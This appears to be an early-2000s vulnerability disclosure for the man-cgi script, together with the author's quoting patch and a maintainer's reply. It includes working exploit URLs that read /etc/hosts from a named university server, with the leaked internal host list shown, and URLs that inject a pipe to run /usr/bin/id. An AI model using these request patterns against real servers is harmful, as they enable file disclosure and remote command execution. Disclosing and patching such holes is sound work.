Upon researching several possible cgi based man holes I ran across the following bugged code © 1994-1999 Man-cgi 2.00, Panagiotis Christias © 1995 Man-cgi 1.15 Modified for Solaris 2.3, David Adams, © 1994 Man-cgi 1.15, Panagiotis Christias © 1996 Man-cgi 1.15 Ported to linux and maintained by, Tom Vrana the issue is with the filtering of %20 or any other hex encoded url in adittion to a known file name will allow you to view the file with permissions of the web server ... in some implementations it is also possible to specify the path to a known executable and thus you are able to run the executable for example /usr/bin/id. These issues may be used to disclose sensitive information on your servr or possible allow someone to run any command they want on it ... if you have further questions mail me. ---------------------------------------------------------- http://www.ntua.gr/cgi-bin/man-cgi?%20/etc/hosts%20 reveals the following # # Internet host table # 127.0.0.1 localhost #147.102.222.210 achilles.noc.ntua.gr achilles 147.102.222.210 achilles.noc.ntua.gr achilles 147.102.222.211 patroklos.noc.ntua.gr patroklos 147.102.222.230 ulysses.noc.ntua.gr ulysses # Required for backup 147.102.222.250 menelaos.noc.ntua.gr menelaos ----------------------------------------------------------- http://xxx/cgi-bin/man-cgi?/usr/bin/id or http://xxx/cgi-bin/man-cgi?|/usr/bin/id uid=99(nobody) gid=99(nobody) groups=99(nobody) ----------------------------------------------------------- below are the Authors Patches and comments from one of the people who has modified the script to operate on other os's Sorry for my delayed reply, too much work to do and too much email to read and reply. Here is a quick fix: *************** *** 185,191 **** { print "
"; \ printf("NOTE: man page for %s may be in the wrong place. \n",PAGE); \ printf("Try all sections and all optional pages\n",URL,PAGE); } }' \ ! PAGE=$COMMAND URL=$MANCGI fi; ---- 178,184 ---- { print "
"; \ printf("NOTE: man page for %s may be in the wrong place. \n",PAGE); \ printf("Try all sections and all optional pages\n",URL,PAGE); } }' \ ! PAGE="$COMMAND" URL="$MANCGI" fi; The values of the PAGE and URL variables should be quoted. This is the first step. I should correct several other parts of the script. I was quite naive when I wrote man-cgi several years ago :) You're welcome to test the security of http://www.ntua.gr/cgi-bin/man-cgi Regards, Panagiotis -- Panagiotis J. Christias Network Management Center P.Christias@noc.ntua.gr National Technical Univ. of Athens, GREECE ---------------------------------------------------------------- On Thu, Feb 22, 2001 at 10:52:41AM -0000, David Adams wrote: Sorry to be so dim, but I really could not fathom the point you were trying to make with your first email. Only now do I understand the significance of puting in the %20 (space character). I still don't understand your anonymity, but I guess I can live with it. The man-cgi script was written by Panagiotis Christias, and I made some enhancements and got it working for Solaris. It works so well that noone (AFAIK) has bothered to re-write it for Perl. I am grateful that you have pointed out this security loop hole to us. It is up to you whether you report it through the normal channels or not. As it can be used to read the /etc/passwd file it could be a real security threat. I will look at the script and see if I can find a solution, I hope Panagiotis will do the same. -- David Adams Computing Services Southampton University